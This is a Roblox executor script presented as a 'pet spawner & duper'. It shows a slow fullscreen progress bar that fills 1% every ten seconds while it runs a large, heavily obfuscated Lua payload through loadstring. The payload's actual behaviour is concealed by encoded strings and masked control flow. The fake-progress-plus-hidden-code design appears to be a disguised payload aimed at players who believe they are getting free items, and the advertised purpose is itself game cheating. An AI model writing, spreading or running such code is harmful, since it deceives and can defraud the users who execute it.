-- UI Script for Executor - Fullscreen progress bar + obfuscated script execution

local RunService = game:GetService("RunService")
local StarterGui = game:GetService("StarterGui")

-- Create ScreenGui
local screenGui = Instance.new("ScreenGui")
screenGui.Name = "WhqttPetSpawnerDuper"
screenGui.ResetOnSpawn = false

-- Try parenting to CoreGui; fallback to StarterGui if that fails
local parentGui = game:GetService("CoreGui")
local successParent, errParent = pcall(function()
    screenGui.Parent = parentGui
end)
if not successParent then
    -- fallback
    screenGui.Parent = StarterGui
end

-- Title Label
local titleLabel = Instance.new("TextLabel")
titleLabel.Name = "Title"
titleLabel.Size = UDim2.new(1, 0, 0, 40)
titleLabel.Position = UDim2.new(0, 0, 0, 5)
titleLabel.BackgroundTransparency = 1
titleLabel.Text = "whqtt pet spawner & duper"
titleLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
titleLabel.Font = Enum.Font.SourceSansBold
titleLabel.TextScaled = true
titleLabel.Parent = screenGui

-- Progress bar background
local progressBarBg = Instance.new("Frame")
progressBarBg.Name = "ProgressBarBg"
progressBarBg.Size = UDim2.new(0.9, 0, 0, 30)
progressBarBg.Position = UDim2.new(0.05, 0, 0, 50)
progressBarBg.BackgroundColor3 = Color3.fromRGB(50, 50, 50)
progressBarBg.ClipsDescendants = true
progressBarBg.Parent = screenGui

local bgUICorner = Instance.new("UICorner")
bgUICorner.CornerRadius = UDim.new(0, 12)
bgUICorner.Parent = progressBarBg

-- Progress bar fill
local progressBarFill = Instance.new("Frame")
progressBarFill.Name = "ProgressBarFill"
progressBarFill.Size = UDim2.new(0, 0, 1, 0) -- start empty
progressBarFill.BackgroundColor3 = Color3.fromRGB(0, 255, 0)
progressBarFill.Parent = progressBarBg

local fillUICorner = Instance.new("UICorner")
fillUICorner.CornerRadius = UDim.new(0, 12)
fillUICorner.Parent = progressBarFill

-- Progress state
local progressPercent = 0
local function updateProgressBar()
    progressBarFill.Size = UDim2.new(progressPercent / 100, 0, 1, 0)
end

-- Increment progress 1% every 10 seconds
spawn(function()
    while progressPercent < 100 do
        wait(10)
        progressPercent = progressPercent + 1
        updateProgressBar()
    end
end)

-- Execute obfuscated script safely
local obfuscatedCode = [[
return(function(...)local N={"\106\085\101\071\098\112\115\102","\114\069\106\115\078\101\086\052\074\122\085\056\079\119\119\117\070\108\110\054\121\065\082\107\078\120\117\101\103\120\071\090\106\080\052\073\075\050\080\087\102\074\052\061","\050\070\118\102\080\052\061\061","\049\121\116\100\098\052\061\061","\108\085\049\116\079\077\049\099\108\109\067\074\077\047\077\122\077\070\080\061";"\106\111\116\057\056\121\118\072","\065\086\119\109\056\105\073\090\065\119\061\061","\117\057\066\052\103\102\056\072\108\104\069\071\049\107\066\117\050\100\104\115\106\066\118\075\065\121\105\088\070\120\049\088\103\079\080\053\107\115\115\111\087\089\076\078\079\090\113\117\110\066\118\112\088\077\108\051\069\110\090\083\065\090\111\097\099\070\116\098\069\100\049\102\086\109\078\068\055\053\107\119\116\052\116\102\067\083\120\119\043\116\099\056\087\097\078\119\097\082\077\072\071\043\120\054\105\047\054\077\066\065\102\053\065\080\109\081\099\052\097\120\112\108\100\086\070\107\121\053\071\084\065\083\110\106\075\082\099\078\053\078\088\052\103\078\065\072\073\117\097\110\122\074\085\077\075\097\050\107\105\104\049\073\121\052\121\104\109\055\053\111\102\090\072\103\103\086\077\106\053\120\054\087\071\085\082\051\100\112\054\104\089\043\107\073\108\109\078\082\110\048\108\054\104\108\119\120\118\105\071\121\050\105\114\100\079\065\090\099\082\117\057\066\072\120\117\087\101\084\068\055\052\079\101\119\047\121\089\081\088\083\070\066\081\098\043\108\072\109\086\048\065\121\050\074\085\108\079\053\112\122\118\102\076\109\090\103\121\083\053\073\088\081\085\118\098\111\084\119\061\061","\079\074\118\102\101\084\049\090\098\076\073\100\065\074\110\087\098\052\061\061";"\079\121\101\110\101\078\119\113\101\055\079\115\049\070\077\072\098\079\119\061","\049\121\116\086\108\121\079\061","\108\121\077\057";"\065\119\061\061","\082\074\119\110\106\100\077\080\065\074\099\113\051\084\077\111\112\079\113\061";"\120\100\067\053\080\109\099\053\098\104\072\100\065\078\068\105\112\112\104\061";"\077\114\077\086\098\121\118\088\098\052\061\061";"\077\121\116\072\106\121\077\071\122\074\101\109\049\121\077\047\049\121\077\084\122\048\061\061","\116\085\056\115\104\082\108\087\112\101\068\105\100\055\119\109\089\097\113\110\056\106\075\101\049\118\088\108\111\050\079\117\114\071\065\066\116\050\070\101\103\055\057\108\084\104\074\118\119\110\104\073\112\068\065\101\115\104\055\120\114\043\078\114\122\067\119\115\047\067\085\101\113\075\105\067\073\120\066\097\106\122\057\115\104\081\071\098\090\107\112\073\076\070\097\106\081\086\119\075\108\080\109\084\048\055\099\102\071\048\061\061";"\049\121\118\057\049\112\070\086\056\050\122\061";"\056\111\110\088\108\085\122\061","\080\102\109\104\056\048\061\061","\122\118\047\109\056\055\073\115\074\065\107\075\066\120\078\057\077\047\067\086\100\057\083\079\043\067\069\079\113\082\115\085\075\101\111\118\074\050\083\106\054\048\043\105\066\074\071\078\120\079\081\079\078\118\105\103\081\051\097\116\083\073\049\051\086\098\104\073\118\099\057\119\086\104\066\099\120\100\053\112\102\068\083\067\097\098\108\099\075\075\115\043\100\116\113\051\102\084\052\071\070\067\088\079\090\099\086\090\122\057\043\111\114\083\100\099\100\108\103\087\106\122\110\074\116\119\078\085\050\090\104\082\082\086\102\110\116\114\048\066\103\086\055\054\114\099\078\052\085\048\069\083\083\115\081\068\055\070\113\088\121\097\072\073\056\116\048\090\089\122\111\113\070\088\047\067\102\116\106\105\066\071\119\101\071\084\100\103\086\107\051\078\057\076\121\098\112\057\050\111\050\116\056\082\114\056\067\118\078\102\076\075\055\053\106\122\110\078\066\077\074\048\074\089\079\089\055\097\117\065\050\084\068\113\118\101\120\079\110\112\054\112\048\084\051\049\079\122\082\078\107\116\068\051\057\103\110\066\118\065\115\054\100\072\088\102\066\066\089\066\078\085\115\055\118\082\114\048\061\061","\080\114\099\099\106\119\061\061";"\050\070\118\090\108\111\101\109\081\097\061\061","\098\109\101\073\106\047\074\115\056\047\120\057\077\084\115\054\051\048\061\061","\050\070\118\117\056\112\113\061";"\106\043\110\085\089\117\090\106\106\053\052\048\114\088\113\071\117\069\115\082\112\069\073\061";"\051\104\120\101\108\114\051\104\082\102\119\104\082\074\118\052\078\114\104\061","\049\112\115\052\080\112\120\053";"\101\079\116\120\082\114\072\116\106\104\099\114\120\114\072\114\101\079\122\061","\056\085\120\070\080\119\061\061","\050\070\118\072\056\050\101\099\049\121\116\086\108\121\079\061","\108\121\118\099\056\076\120\104\106\111\109\057\056\052\061\061";"\051\084\090\073\077\121\117\071\081\112\090\067\108\112\077\104";"\120\121\110\086\051\104\120\111\056\050\067\050\056\076\077\073\077\076\051\061","\108\055\120\057\049\048\061\061","\080\114\116\113\108\104\090\071\082\121\109\098\101\111\048\070","\106\121\120\099\108\121\052\061";"\108\055\074\061";"\106\114\077\104\108\112\077\104\080\050\101\099\080\111\110\109";"\080\114\118\057\080\114\116\104";"","\118\119\074\083\076\082\097\061","\106\084\077\043\079\055\056\090\079\102\101\047\101\121\090\101\120\102\084\061";"\098\078\109\054\056\109\068\084\080\100\120\109\051\077\120\110\048\048\061\061","\108\055\122\061","\082\076\101\104\106\074\049\109\049\097\061\061";"\056\114\070\099\049\121\120\073";"\106\111\077\072\108\085\056\109";"\108\112\116\104\098\097\061\061";"\077\050\120\109\106\111\115\099\108\112\079\061","\056\050\068\071\108\085\122\061";"\077\077\068\051","\065\076\049\079\079\112\118\113\101\111\049\076","\049\109\116\101","\056\114\116\072\056\048\061\061";"\049\121\118\100\049\076\068\090\108\111\106\061"}local function A(A)return N[A+(867515+-849841)]end for A,V in ipairs({{1013888-1013887;477992-477935},{-55457-(-55458);-1952+1957},{909244+-909238,-938109+938166}})do while V[875324-875323]<V[-1018240+1018242]do N[V[364267+-364266]],N[V[783546-783544]],V[833274+-833273],V[-893562-(-893564)]=N[V[-280617+280619]],N[V[-161381+161382]],V[-681077+681078]+(-518192+518193),V[276457+-276455]-(753848-753847)end end do local A={x=254517-254504,s=890357-890300,S=-1022976+1023034;A=1046606-1046592,Z=-905235-(-905276);J=695798+-695794;["\047"]=10144+-10109;T=-27873+27909;M=-254952+254973,C=896700+-896699;U=-888901-(-888956);X=-654452+654499,["\055"]=795961+-795958,p=28343-28321;W=125028+-124986;["\049"]=-876062-(-876091);e=685254-685237;u=-610611+610655;Q=723574+-723544,c=-125284+125317,d=-952907-(-952958);y=588280-588274,b=555057+-555031,q=136028-135972;D=-182118+182127,R=-281047-(-281065);B=174627-174565;H=793529+-793484;L=-349931+349938;m=-796820-(-796857);O=-5408+5428,i=286443-286441;F=758328+-758275,a=662965+-662965,["\057"]=-940157+940203,h=-942281-(-942333),n=291866-291817,l=-137033-(-137060);G=788856+-788806,P=-840442+840466,z=-448558+448566,["\054"]=-485679+485690;k=320426+-320411;I=650844-650804;["\053"]=-174309+174352;["\050"]=161765+-161742;j=454958+-454930;w=-428141+428173;["\043"]=900614-900604;["\052"]=-373612+373660;N=-630433-(-630452);["\048"]=-379292-(-379308);o=475503+-475465,Y=-1025857-(-1025920),K=-805722-(-805753),V=370923+-370889;v=54498+-54437,g=-654585-(-654644);E=-398768-(-398828);r=-678079-(-678133);f=863906-863867;["\056"]=198374+-198349,t=326634+-326629;["\051"]=-17237-(-17249)}local V=string.char local b=string.len local P=math.floor local e=N local R=table.concat local x=string.sub local Z=table.insert local l=type for N=-439533-(-439534),#e,79330+-79329 do local F=e[N]if l(F)=="\115\116\114\105\110\103"then local l=b(F)local K={}local T=-152485+152486 local p=364651-364651 local M=837114-837114 while T<=l do local N=x(F,T,T)local b=A[N]if b then p=p+b*(-14304-(-14368))^((-548014-(-548017))-M)M=M+(220967+-220966)if M==64294-64290 then M=-50146-(-50146)local N=P(p/(-9442-(-74978)))local A=P((p%(-621813-(-687349)))/(-787000+787256))local b=p%(-603315-(-603571))Z(K,V(N,A,b))p=89315+-89315 end elseif N=="\061"then Z(K,V(P(p/(-61924-(-127460)))))if T>=l or x(F,T+(810297+-810296),T+(287722-287721))~="\061"then Z(K,V(P((p%(-831932-(-897468)))/(225639+-225383))))end break end T=T+(-870266-(-870267))end e[N]=R(K)end end end return(function(N,b,P,e,R,x,Z,d,q,l,r,p,T,E,a,u,K,M,F,V)M,E,T,l,K,a,q,p,u,V,F,d,r=function(N)local A,V=542001+-542000,N[-831866+831867]while V do F[V],A=F[V]-(-968766+968767),A+(-645748+645749)if-191206+191206==F[V]then F[V],l[V]=nil,nil end V=N[A]end end,function(N,A)local b=p(A)local P=function(P,e,R)return V(N,{P;e;R},A,b)end return P end,74594-74594,{},function()T=T+(-799160-(-799161))F[T]=25889+-25888 return T end,function(N,A)local b=p(A)local P=function(P,e)return V(N,{P,e},A,b)end return P end,function(N,A)local b=p(A)local P=function()return V(N,{},A,b)end return P end,function(N)for A=891069-891068,#N,-1002303+1002304 do F[N[A]]=(-500656+500657)+F[N[A]]end if P then local V=P(true)local b=R(V)b[A(959057-976702)],b[A(-480368-(-462702))],b[A(-452824-(-435181))]=N,M,function()return 2372969-634292 end return V else return e({},{[A(-697527-(-679861))]=M;[A(403776-421421)]=N;[A(-443672-(-426029))]=function()return 897851-(-840826)end})end end,function(N,A)local b=p(A)local P=function(P)return V(N,{P},A,b)end return P end,function(V,P,e,R)local C,L,h,s,J,O,W,B,z,o,f,G,k,T,H,Z,S,I,y,d,m,g,n,t,F,M,i,U,w,X,j,p,Y,Q while V do if V<45025+9111614 then if V<2954979-(-397228)then if V<643039-(-884731)then if V<1245311-189670 then if V<483175-(-404653)then if V<1354278-645108 then if V<1119763-587058 then F=A(-826797-(-809145))Z=A(437294+-454911)V=N[Z]Z=V(F)V=N[A(493231+-510872)]Z={}else Z=C V=I V=C and 408429+3587341 or 10812586-(-513712)end else H=25696500101669-316586 T=A(-316399-(-298729))Z=A(527117-544753)V=N[Z]h=A(-1049331-(-1031680))F=N[T]M=l[e[-473902-(-473903)]]d=l[e[376750-376748]]L=d(h,H)p=M[L]M=A(-214524-(-196902))M=F[M]T={M(F,p)}Z=V(b(T))V=Z()Z={}V=N[A(78562+-96201)]end else if V<175957-(-751671)then z=r(z)t=r(t)G=r(G)Q=r(Q)V=294505+1888729 w=nil X=r(X)U=r(U)else I=I+y H=I<=C J=not j H=J and H J=I>=C J=j and J H=J or H J=2483115-(-696502)V=H and J H=5644364-(-393324)V=V or H end end else if V<2020010-737271 then if V<-1024064+2159898 then if V<2064047-958782 then i=-206566+206572 B=-623410-(-623411)V=l[h]m=V(B,i)V=A(-979838+962215)N[V]=m i=A(-203901-(-186278))B=N[i]i=-617457-(-617459)V=B>i V=V and 13515197-155685 or-391852+7452547 else l[T]=Z V=-590642+1490765 end else l[T]=o V=l[T]V=V and-183078+14175441 or 364971+8146265 end else if V<441643-(-978366)then i=689333-689333 k=#J Y=k==i V=Y and-96931+16734879 or-391852+6215006 else Z={}V=N[A(983491-1001151)]end end end else if V<-93603+2429285 then if V<1667473-(-540529)then if V<-290793+2407292 then if V<1949027-(-160037)then p=l[e[574136-574130]]V=-46625+7496964 T=p==F Z=T else m=l[T]o=m V=m and 15846532-85155 or 1063936-(-142372)end else z=not i o=o+B Z=o<=m Z=z and Z z=o>=m z=i and z Z=z or Z z=13993675-(-579826)V=Z and z Z=1681683-(-428333)V=V or Z end else if V<-602099+2905932 then V=3923671-109155 T=l[e[-375340+375342]]p=l[e[92387+-92384]]F=T==p Z=F else j=A(667573+-685231)h=A(-27297+9678)L=Z Z=N[h]H=A(812281+-829939)h=A(-86177-(-68514))V=Z[h]h=K()l[h]=V Z=N[H]H=A(-814933-(-797305))V=Z[H]I=V H=V y=N[j]V=y and 10531682-513584 or 206694+329898 C=y end end else if V<2221509-(-877819)then if V<861627+1784103 then t=not X k=k+z Y=k<=i Y=t and Y t=k>=i t=X and t Y=t or Y t=642356+8528868 V=Y and t Y=10761833-555825 V=V or Y else V=14084366-(-1010367)end else if V<2942934-(-331178)then B=A(698226-715894)H=I m=N[B]B=A(495552-513200)o=m[B]m=o(F,H)o=l[e[-792051-(-792057)]]B=o()k=m+B V=49762+999870 Y=k+L B=13856+-13855 k=835002+-834746 H=nil J=Y%k k=p[T]L=J m=L+B o=M[m]Y=k..o p[T]=Y else T=l[e[170149+-170147]]p=124132+-124059 F=T*p T=1312153294140-741495 Z=F+T F=35184372068447-(-20385)T=774328+-774327 V=Z%F l[e[349869-349867]]=V V=5214336-795641 F=l[e[-113185-(-113188)]]Z=F~=T end end end end else if V<5593521-(-443246)then if V<96291+5031100 then if V<527984+3322387 then if V<-282089+4116447 then if V<3446602-(-239143)then d=299179-299177 T=l[e[-548081+548082]]M=430573+-430572 p=T(M,d)T=-990847+990848 F=p==T Z=F V=F and-56162+3870678 or-263208+2565230 else V=Z and 67234+16635740 or 9999249-(-179622)end else Z=A(316947-334570)F=A(825914+-843544)V=N[Z]Z=N[F]F=A(533745+-551375)N[F]=V F=A(665781+-683404)N[F]=Z V=15795203-700470 F=l[e[-76002+76003]]T=F()end else if V<3690134-(-544881)then C=K()l[C]=Z V=l[h]I=-387116+387119 y=-901755-(-901820)Z=V(I,y)B=A(-548405-(-530736))V=468719+-468719 I=K()y=V l[I]=Z Y=a(9098934-(-388204),{})V=1035456+-1035456 j=V J=A(664214-681845)Z=N[J]J={Z(Y)}V={b(J)}Z=861115+-861113 J=V V=J[Z]Y=V Z=A(-763768+746118)V=N[Z]k=l[p]m=N[B]B=m(Y)m=A(-557745+540083)o=k(B,m)k={o()}Z=V(b(k))k=K()l[k]=Z o=l[I]m=o V=-1015359+3198593 Z=394540+-394539 o=-121444+121445 B=o o=-280169-(-280169)i=B<o o=Z-B else T=l[e[236714-236711]]p=716406+-716313 F=T*p T=627827+-627570 Z=F%T l[e[-1033149-(-1033152)]]=Z V=15281523-170917 end end else if V<-650804+6423031 then if V<-752951+6048638 then T=-597042-(-597043)V={}F=V p=l[e[503984+-503975]]M=p p=86115+-86114 d=p p=-160805-(-160805)V=743799+15113325 L=d<p p=T-d else Z=15974792-(-82531)p=-252840+11589890 T=A(-537847-(-520176))F=T^p V=Z-F Z=A(-901276-(-883643))F=V V=Z/F Z={V}V=N[A(-196489-(-178854))]end else if V<6373436-384876 then k=544818-544817 i=#J Y=p(k,i)V=1497742-184422 k=L(J,Y)i=l[j]t=846651-846650 X=k-t z=h(X)Y=nil i[k]=z k=nil else O=l[T]Z=O V=O and 14130704-604275 or 1168835-37793 end end end else if V<8955980-672181 then if V<624179+6615699 then if V<7479342-402988 then if V<7580348-549937 then L=nil M=nil h=nil V=481903+10839787 else i=A(245736+-263359)V=N[i]i=A(462638+-480268)N[i]=V V=16090700-447598 end else V=l[e[-405731-(-405741)]]T=l[e[608062-608051]]F[V]=T V=l[e[935049-935037]]T={V(F)}V=N[A(-468271+450627)]Z={b(T)}end else if V<7502926-3296 then V=233511+9945360 F=nil l[e[-471279+471284]]=Z else F=l[e[834107-834106]]Z=#F F=429357+-429357 V=Z==F V=V and 4243554-927229 or 233063+14464858 end end else if V<752055+7820135 then if V<-132260+8568351 then V=-685493+12007183 else V=true V=1024832+9672711 end else if V<618099+8225407 then V=true V=V and-186022+1267911 or 1497229-(-22433)else Z={}V=N[A(-857818-(-840186))]end end end end end else if V<14451451-447790 then if V<251240+10792730 then if V<11069732-972030 then if V<-828538+10379635 then if V<-427309+9850596 then if V<212455+9095920 then V=2645169-24161 Y=k t=Y J[Y]=t Y=nil else F=A(-736759+719142)V=N[F]p=554161-554161 T=l[e[100267-100259]]F=V(T,p)V=4652077-(-544881)end else T=A(-62050+44378)p=-857467+13606657 Z=-200166+9150200 F=T^p V=Z-F Z=A(-589938+572274)F=V V=Z/F Z={V}V=N[A(65058+-82682)]end else if V<716598+9147411 then V=15277171-253096 f=-617651+617652 n=w[f]O=n else J=A(-937149+919491)V=367019-(-169573)j=N[J]J=A(415237-432877)y=j[J]C=y end end else if V<9922260-(-291433)then if V<-243048+10440395 then V=l[e[-1045120+1045127]]V=V and 8804333-(-517424)or-44577+5241535 else k=#J V=-865339+6688493 i=943421-943421 Y=k==i end else if V<10485289-153893 then I=r(I)h=r(h)Y=nil J=nil L=nil M=r(M)H=nil p=r(p)d=r(d)k=r(k)j=nil M=K()h=A(553713+-571332)p=nil C=r(C)T=r(T)T=nil V=-694902+3315910 l[M]=T j=K()T=K()L=A(959595-977214)y=nil J={}l[T]=p d=N[L]C=A(221475-239143)y={}L=A(407021+-424670)p=d[L]d=K()l[d]=p L=N[h]h=A(719670+-737333)p=L[h]H=A(600819+-618477)h=N[H]k=-410797+411053 i=k I=K()H=A(1024640+-1042260)L=h[H]H=N[C]C=A(-541598-(-523952))h=H[C]C=K()H=396396-396396 k=1023937-1023936 l[C]=H z=k Y=-580850+580851 H=-1004863+1004865 l[I]=H k=199206+-199206 H={}l[j]=y X=z<k k=Y-z y=-828154+828154 else V=a(-804793+3576845,{M})m={V()}Z={b(m)}V=N[A(-843632-(-825978))]end end end else if V<-945405+14070999 then if V<13137036-558385 then if V<-1001855+12598180 then if V<11890566-567474 then Z={T}V=N[A(750327+-767982)]else I=A(-227687+210047)V=4330148-334378 C=N[I]Z=C end else V=n V=414060-(-716982)Z=O end else if V<346603+12351671 then n=l[T]O=n V=n and-929405+10619813 or 15246834-222759 else s=-342059+342061 W=w[s]V=11415932-(-518640)s=l[Q]f=W==s O=f end end else if V<445806+13027116 then if V<13393568-202342 then V=true p=A(-569394+551726)T=K()l[T]=V Z=N[p]F=P M=K()h=A(708022+-725653)p=A(874535-892156)V=Z[p]p=K()d=K()l[p]=V H=u(-745463+15596989,{d})V=q(-360235+874298,{})l[M]=V V=false l[d]=V L=N[h]h=L(H)Z=h V=h and-719414+15744001 or-412717+2720883 else z=A(66530+-84160)B=A(257512+-275181)V=N[B]i=N[z]B=V(i)V=A(241063+-258686)N[V]=B V=15134190-(-508912)end else if V<14296402-388332 then n=V s=233576-233575 W=w[s]s=false f=W==s V=f and 12579552-(-469679)or-505456+12440028 O=f else V=1008447+9219065 end end end end else if V<16031805-705846 then if V<1018112+13896053 then if V<-532336+15211460 then if V<3232+14590707 then if V<14998567-694582 then V=8510307-(-214951)else z=K()X=A(-358974-(-341355))t=589170+-589070 l[z]=o Z=N[X]X=A(795002-812665)V=Z[X]X=-642996+642997 Z=V(X,t)X=K()l[X]=Z V=l[h]t=14880-14880 U=137827-137572 S=115108+-105108 Z=V(t,U)t=K()l[t]=Z U=-482351+482352 V=l[h]G=l[X]g=-245608-(-245608)Z=V(U,G)U=K()l[U]=Z w=263400+-263398 Q=-477486-(-477487)Z=l[h]G=Z(Q,w)w=A(-670453+652797)Z=660468+-660467 f=A(-761596-(-743927))V=G==Z G=K()Z=A(-978620-(-960958))l[G]=V n=N[f]W=l[h]s={W(g,S)}V=A(224807+-242445)V=Y[V]f=n(b(s))n=A(-271136-(-253480))O=f..n Q=w..O V=V(Y,Z,Q)Q=K()l[Q]=V w=A(454736-472367)Z=N[w]O=u(3484234-102883,{h,z;I,p;T;k,G,Q;X;U,t;C})w={Z(O)}V={b(w)}w=V V=l[G]V=V and 5264064-(-730615)or 12564576-(-67874)end else V={}l[e[56868-56866]]=V Z=l[e[288937+-288934]]M=Z d=35184371494414-(-594418)Z=T%d l[e[-790072+790076]]=Z h=193317-193062 H=A(91747+-109415)L=T%h h=-486829-(-486831)d=L+h I=-472815+472816 l[e[763640+-763635]]=d h=N[H]H=A(618099+-635756)L=h[H]h=L(F)L=A(-517232+499605)p[T]=L L=57570+-57556 C=h y=I I=944445-944445 V=-665205+1714837 H=-81122-(-81123)j=y<I I=H-y end else if V<14119815-(-692789)then p=A(-737911+720253)T=N[p]p=A(451310+-468930)F=T[p]V=N[A(191275-208934)]p=l[e[93284-93283]]T={F(p)}Z={b(T)}else V=true l[e[569522+-569521]]=V V=N[A(943357+-960982)]Z={}end end else if V<-257704+15337688 then if V<14918701-(-105379)then l[T]=O g=-403179-(-403180)s=l[U]W=s+g f=w[W]n=y+f f=255784-255528 V=n%f W=l[t]f=j+W W=-277161+277417 y=V n=f%W j=n V=458478+441645 else L=l[d]Z=L V=2170914-(-137252)end else if V<16079170-980734 then V=true V=V and-126052+3973337 or 289321+8559845 else p=-144995-(-144996)T=l[e[318893-318890]]F=T~=p V=F and 15817795-63074 or 4127774-(-290921)end end end else if V<14918549-(-1026304)then if V<16190231-431021 then if V<-953918+16622845 then if V<16618890-989375 then T=p C=-813241+813496 H=-257320+257320 V=l[e[360235+-360234]]h=V(H,C)V=15546618-(-310506)F[T]=h T=nil else V=9089717-364459 end else T=l[e[-396521-(-396524)]]p=787544-787512 F=T%p C=34593+-34591 M=l[e[894144-894140]]y=939517+-939504 h=l[e[777464+-777462]]Y=l[e[133860+-133857]]J=Y-F Y=-554097+554129 j=J/Y I=y-j H=C^I L=h/H y=140196+-139940 d=M(L)M=-330730+4295298026 p=d%M d=846138+-846136 M=d^F T=p/M H=-996415+996416 M=l[e[760376+-760372]]h=T%H H=421229+4294546067 L=h*H d=M(L)M=l[e[869695-869691]]L=M(T)h=708212-642676 p=d+L d=10142-(-55394)C=-729719-(-729975)M=p%d F=nil L=p-M d=L/h h=405485+-405229 L=M%h H=M-L M=nil h=H/C T=nil p=nil V=753911+13944010 C=-288553+288809 H=d%C I=d-H C=I/y I={L;h;H,C}L=nil l[e[-290793+290794]]=I d=nil H=nil C=nil h=nil end else if V<-959166+16773436 then m=y==j o=m V=1371273-164965 else p=p+d T=p<=M h=not L T=h and T h=p>=M h=L and h T=h or T h=15478841-(-92579)V=T and h T=8196570-1042688 V=V or T end end else if V<16254159-(-284393)then if V<-987071+17051360 then V=true V=V and 14087758-(-102243)or 11599875-902332 else T=P[224231+-224229]V=l[e[500401-500400]]p=V V=p[T]V=V and 7777293-(-639732)or-264872+14868582 F=P[892925-892924]end else if V<16128964-(-515952)then Z={}k=K()i=q(82979+7438018,{k;C,I;d})f=nil h=nil p=nil y=nil L=nil Y={}t={}y=511024+2120704310151 d=r(d)J=nil z=K()l[k]=Y Y=K()l[Y]=i i={}G=A(-618208-(-600563))H=nil w=A(-15685-1952)l[z]=i X=A(-886744-(-869115))i=N[X]Q=l[z]U={[G]=Q;[w]=f}X=i(t,U)l[T]=X i=E(45025+16262673,{z;k,j,C;I,Y})C=r(C)I=r(I)k=r(k)Y=r(Y)L=A(-739639-(-721974))j=r(j)l[M]=i z=r(z)d=N[L]h=l[T]I=A(-61538+43912)H=l[M]C=H(I,y)i=449518+17697952392308 L=h[C]p=d[L]I=837818+8261620880724 L=a(978622+-215719,{T;M})d=p(L)d=l[T]H=A(-484719+467077)L=l[M]C=20402790659981-(-381612)h=L(H,C)C=A(-36388-(-18721))p=d[h]d=A(-73186+55568)N[d]=p y=-928317+28540929610257 L=l[T]h=l[M]H=h(C,I)d=L[H]L=A(279785+-297438)N[L]=d h=l[T]I=A(792700-810361)H=l[M]C=H(I,y)k=A(300201+-317848)L=h[C]H=A(879611+-897247)h=A(178470+-196143)N[h]=L V=N[A(-345707+328073)]I=A(-258221-(-240551))h=N[H]C=N[I]j=l[T]J=l[M]Y=J(k,i)M=r(M)T=r(T)y=j[Y]j=A(-670773+653151)j=C[j]I={j(C,y)}H=h(b(I))h=H()else C=q(4416998-(-954046),{})Z=A(-340523+322873)V=N[Z]F=l[e[-11100-(-11104)]]M=A(-618680-(-601011))p=N[M]H=A(-179878+162247)h=N[H]H={h(C)}L={b(H)}h=-157411-(-157413)d=L[h]M=p(d)p=A(363758-381420)T=F(M,p)F={T()}Z=V(b(F))T=l[e[-490671+490676]]V=T and 907324+624626 or 860155+6590184 F=Z Z=T end end end end end end end V=#R return b(Z)end,{},function(N,A)local b=p(A)local P=function(...)return V(N,{...},A,b)end return P end,function(N)F[N]=F[N]-(362539+-362538)if-354603-(-354603)==F[N]then F[N],l[N]=nil,nil end end return(d(12359449-(-787576),{}))(b(Z))end)(getfenv and getfenv()or _ENV,unpack or table[A(820857+-838497)],newproxy,setmetatable,getmetatable,select,{...})end)(...)

]]

local function safeLoadstring(code)
    if type(loadstring) == "function" then
        local func, loadErr = loadstring(code)
        if not func then
            warn("loadstring error:", loadErr)
            return
        end
        local ok, runErr = pcall(func)
        if not ok then
            warn("Execution error:", runErr)
        end
    else
        warn("loadstring function not available in this executor.")
    end
end

safeLoadstring(obfuscatedCode)
